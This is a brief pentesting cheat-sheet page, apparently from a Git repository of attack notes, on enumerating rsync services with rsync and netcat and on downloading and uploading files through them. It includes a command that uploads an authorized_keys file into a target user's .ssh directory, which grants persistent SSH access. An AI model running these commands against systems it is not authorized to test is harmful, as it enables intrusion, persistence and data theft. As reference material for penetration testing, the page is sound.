killchain-compendium/enumeration/docs/rsync.md

40 lines
745 B
Markdown
Raw Normal View History

2021-11-06 23:40:23 +01:00
# rsync
2022-01-09 22:52:39 +01:00
* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
2021-11-06 23:40:23 +01:00
## Enumerate
```sh
rsync <target-IP>::
rsync <target-IP>::files
rsync <target-IP>::files/foo/
```
2022-01-09 22:52:39 +01:00
### via netcat
* Another way is the following
```sh
nc -vn $TARGET_IP 873
```
* Repeat the identical handshake, e.g.
```
@RSYNCD: 31.0
```
* List all directories
```sh
#list
```
2021-11-06 23:40:23 +01:00
## Downloads
```sh
rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo .
```
## Uploads
```sh
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
rsync -r documents <user>@<target-IP>::/files/foo/
```